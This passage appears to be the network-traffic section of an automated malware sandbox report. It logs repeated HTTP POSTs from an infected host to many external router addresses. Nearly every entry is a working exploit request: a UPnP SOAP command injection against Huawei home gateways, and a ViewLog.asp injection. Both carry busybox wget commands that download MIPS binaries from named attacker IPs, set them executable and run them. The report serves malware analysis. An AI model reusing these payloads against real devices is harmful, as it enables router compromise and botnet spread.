                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:50.118257999 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:56.262207031 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:08.294208050 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              531192.168.2.134290431.61.127.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.432944059 CET355OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips
                                              Nov 23, 2023 05:17:49.606333017 CET355OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              532192.168.2.135648041.37.44.16637215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.866241932 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:48.262404919 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:48.540235996 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              533192.168.2.134915462.29.61.1498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.511138916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.654233932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              534192.168.2.134034894.121.190.1588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.666558981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              535192.168.2.134575295.86.93.1768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.690603971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              536192.168.2.134870062.94.63.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.778994083 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.991090059 CET433INHTTP/1.0 302 Redirect
                                              Date: Thu, 23 Nov 2023 04:17:47 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html
                                              Location: /index.html
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 09 09 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 74 6f 20 61 20 6e 65 77 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 28 6e 75 6c 6c 29 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 6c 6f 63 61 74 69 6f 6e 3c 2f 61 3e 2e 0d 0a 09 09 50 6c 65 61 73 65 20 75 70 64 61 74 65 20 79 6f 75 72 20 64 6f 63 75 6d 65 6e 74 73 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 6e 65 77 20 6c 6f 63 61 74 69 6f 6e 2e 0d 0a 09 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head></head><body>This document has moved to a new <a href="http://(null)/index.html">location</a>.Please update your documents to reflect the new location.</body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              537192.168.2.134506294.122.224.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.889543056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              538192.168.2.134891894.122.88.1588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.401249886 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              539192.168.2.133998294.122.121.298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.401318073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
